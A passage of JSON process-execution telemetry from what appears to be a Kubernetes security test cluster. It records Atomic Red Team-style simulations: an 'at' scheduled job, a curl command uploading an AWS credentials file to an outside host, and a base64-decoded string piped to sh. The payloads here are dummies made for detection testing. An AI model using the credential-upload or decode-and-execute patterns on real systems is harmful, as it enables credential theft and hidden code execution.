clone","start_time":"2025-09-29T23:31:32.726595737Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":2558056,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-29T23:31:46.394948059Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDc5OTU5MTIyMjM5OjI1NTgzNjM=","pid":2558363,"uid":0,"cwd":"/","binary":"/usr/sbin/atd","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-29T23:31:46.392339791Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-at-schedule","container":{"id":"containerd://5df343224db6773075e3837310923ec3e37c25845baa339468bf60a076e7c58c","name":"atomic-at-schedule","image":{"id":"docker.io/library/ubuntu@sha256:353675e2a41babd526e2b837d7ec780c2a05bca0164f7ea5dbbd433d21d166fc","name":"docker.io/library/ubuntu:latest"},"start_time":"2025-09-29T23:31:36Z","pid":175,"security_context":{}},"pod_labels":{"run":"atomic-at-schedule"},"workload":"atomic-at-schedule","workload_kind":"Pod"},"docker":"5df343224db6773075e3837310923ec","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDc5OTU4MzI1MjEzOjI1NTgzNjI=","tid":2558363,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDc5OTU4MzI1MjEzOjI1NTgzNjI=","pid":2558362,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo 'echo Hello from Atomic Red Team' | at now + 1 minute && at -l\"","flags":"execve inInitTree","start_time":"2025-09-29T23:31:46.391543232Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-at-schedule","container":{"id":"containerd://5df343224db6773075e3837310923ec3e37c25845baa339468bf60a076e7c58c","name":"atomic-at-schedule","image":{"id":"docker.io/library/ubuntu@sha256:353675e2a41babd526e2b837d7ec780c2a05bca0164f7ea5dbbd433d21d166fc","name":"docker.io/library/ubuntu:latest"},"start_time":"2025-09-29T23:31:36Z","pid":174,"security_context":{}},"pod_labels":{"run":"atomic-at-schedule"},"workload":"atomic-at-schedule","workload_kind":"Pod"},"docker":"5df343224db6773075e3837310923ec","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDcwMjY0ODUzNTY2OjI1NTgxMzE=","refcnt":1,"tid":2558362,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDcwMjY0ODUzNTY2OjI1NTgxMzE=","pid":2558131,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo 'echo Hello from Atomic Red Team' | at now + 1 minute && at -l\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-29T23:31:36.698070806Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-at-schedule","container":{"id":"containerd://5df343224db6773075e3837310923ec3e37c25845baa339468bf60a076e7c58c","name":"atomic-at-schedule","image":{"id":"docker.io/library/ubuntu@sha256:353675e2a41babd526e2b837d7ec780c2a05bca0164f7ea5dbbd433d21d166fc","name":"docker.io/library/ubuntu:latest"},"start_time":"2025-09-29T23:31:36Z","pid":1,"security_context":{}},"pod_labels":{"run":"atomic-at-schedule"},"workload":"atomic-at-schedule","workload_kind":"Pod"},"docker":"5df343224db6773075e3837310923ec","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MzAwODE3NDgzOjI1NTgwNjQ=","tid":2558131,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MzAwODE3NDgzOjI1NTgwNjQ=","pid":2558064,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-29T23:31:32.734034648Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MjkzMzc4NTcxOjI1NTgwNTY=","tid":2558064,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MjkzMzc4NTcxOjI1NTgwNTY=","pid":2558056,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c start","flags":"execve clone","start_time":"2025-09-29T23:31:32.726595737Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":2558056,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-29T23:31:46.392339388Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjQwMzYwNjMyMDQ4OjMwMDU0NjQ=","pid":3005464,"uid":101,"cwd":"/home/curl_user","binary":"/usr/bin/curl","arguments":"-ksS --upload-file /home/curl_user/.aws/credentials https://google.com","flags":"execve inInitTree","start_time":"2025-09-30T22:47:46.793849624Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-curl-upload","container":{"id":"containerd://2ab7490f4a6f8aba1412600c7931923c624a79418d51f3028da56151f68d9ac6","name":"atomic-curl-upload","image":{"id":"docker.io/curlimages/curl@sha256:463eaf6072688fe96ac64fa623fe73e1dbe25d8ad6c34404a669ad3ce1f104b6","name":"docker.io/curlimages/curl:latest"},"pid":1,"security_context":{}},"pod_labels":{"run":"atomic-curl-upload"},"workload":"atomic-curl-upload","workload_kind":"Pod"},"docker":"2ab7490f4a6f8aba1412600c7931923","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjQwMzU4MTI3ODg4OjMwMDU0NjQ=","tid":3005464,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjQwMzU4MTI3ODg4OjMwMDU0NjQ=","pid":3005464,"uid":101,"cwd":"/home/curl_user","binary":"/bin/sh","arguments":"-lc \"mkdir -p \"$HOME/.aws\" && echo test > \"$HOME/.aws/credentials\" && curl -ksS --upload-file \"$HOME/.aws/credentials\" https://google.com\"","flags":"execve inInitTree","start_time":"2025-09-30T22:47:46.791345037Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-curl-upload","container":{"id":"containerd://2ab7490f4a6f8aba1412600c7931923c624a79418d51f3028da56151f68d9ac6","name":"atomic-curl-upload","image":{"id":"docker.io/curlimages/curl@sha256:463eaf6072688fe96ac64fa623fe73e1dbe25d8ad6c34404a669ad3ce1f104b6","name":"docker.io/curlimages/curl:latest"},"pid":1,"security_context":{}},"pod_labels":{"run":"atomic-curl-upload"},"workload":"atomic-curl-upload","workload_kind":"Pod"},"docker":"2ab7490f4a6f8aba1412600c7931923","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjQwMzU2NzQ2MTE5OjMwMDU0NjQ=","tid":3005464,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjQwMzU2NzQ2MTE5OjMwMDU0NjQ=","pid":3005464,"uid":101,"cwd":"/home/curl_user","binary":"/entrypoint.sh","arguments":"/entrypoint.sh sh -lc \"mkdir -p \"$HOME/.aws\" && echo test > \"$HOME/.aws/credentials\" && curl -ksS --upload-file \"$HOME/.aws/credentials\" https://google.com\"","flags":"execve clone inInitTree","start_time":"2025-09-30T22:47:46.789963900Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-curl-upload","container":{"id":"containerd://2ab7490f4a6f8aba1412600c7931923c624a79418d51f3028da56151f68d9ac6","name":"atomic-curl-upload","image":{"id":"docker.io/curlimages/curl@sha256:463eaf6072688fe96ac64fa623fe73e1dbe25d8ad6c34404a669ad3ce1f104b6","name":"docker.io/curlimages/curl:latest"},"pid":1,"security_context":{}},"pod_labels":{"run":"atomic-curl-upload"},"workload":"atomic-curl-upload","workload_kind":"Pod"},"docker":"2ab7490f4a6f8aba1412600c7931923","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjM5NTkzMjc2Njc1OjMwMDU0MDU=","tid":3005464,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjM5NTkzMjc2Njc1OjMwMDU0MDU=","pid":3005405,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/67a63eea9131c2d8e51c9edf2c032db1098f2357d6bc99df747f88cb04c69576","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 67a63eea9131c2d8e51c9edf2c032db1098f2357d6bc99df747f88cb04c69576 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-30T22:47:46.026493988Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjM5NTg1MjE3MzY2OjMwMDUzOTc=","tid":3005405,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMTczMjM5NTg1MjE3MzY2OjMwMDUzOTc=","pid":3005397,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/67a63eea9131c2d8e51c9edf2c032db1098f2357d6bc99df747f88cb04c69576","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 67a63eea9131c2d8e51c9edf2c032db1098f2357d6bc99df747f88cb04c69576 start","flags":"execve clone","start_time":"2025-09-30T22:47:46.018434539Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":3005397,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-30T22:47:46.793849009Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMjQ2NjI5OTAxMDA0NzQ0OjMzOTc2Nzc=","pid":3397677,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"echo -n 'echo hello-from-pod' | base64 | base64 -d | sh\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-10-01T19:10:56.334222656Z","auid":4294967295,"pod":{"namespace":"default","name":"b64-decode-sim","container":{"id":"containerd://f0109585796d0e984ebddd0aad8a2d0c6b19b87b1136ef59961f8d8d028ccd31","name":"b64-decode-sim","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"pid":1,"security_context":{}},"pod_labels":{"run":"b64-decode-sim"},"workload":"b64-decode-sim","workload_kind":"Pod"},"docker":"f0109585796d0e984ebddd0aad8a2d0","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMjQ2NjI5NzExMzExODAzOjMzOTc2MTk=","tid":3397677,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMjQ2NjI5NzExMzExODAzOjMzOTc2MTk=","pid":3397619,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bcd41d3b5465b2f47998b124526cb97380055b85c133b81ca686d708a50b50e5","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id bcd41d3b5465b2f47998b124526cb97380055b85c133b81ca686d708a50b50e5 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-10-01T19:10:56.144529026Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMjQ2NjI5NzAzOTM4MjIxOjMzOTc2MTE=","tid":3397619,"in_init_tree":false},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMjQ2NjI5NzAzOTM4MjIxOjMzOTc2MTE=","pid":3397611,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bcd41d3b5465b2f47998b124526cb97380055b85c133b81ca686d708a50b50e5","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id bcd41d3b5465b2f47998b124526cb97380055b85c133b81ca686d708a50b50e5 start","flags":"execve clone","start_time":"2025-10-01T19:10:56.137155551Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":3397611,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-10-01T19:10:56.334222771Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}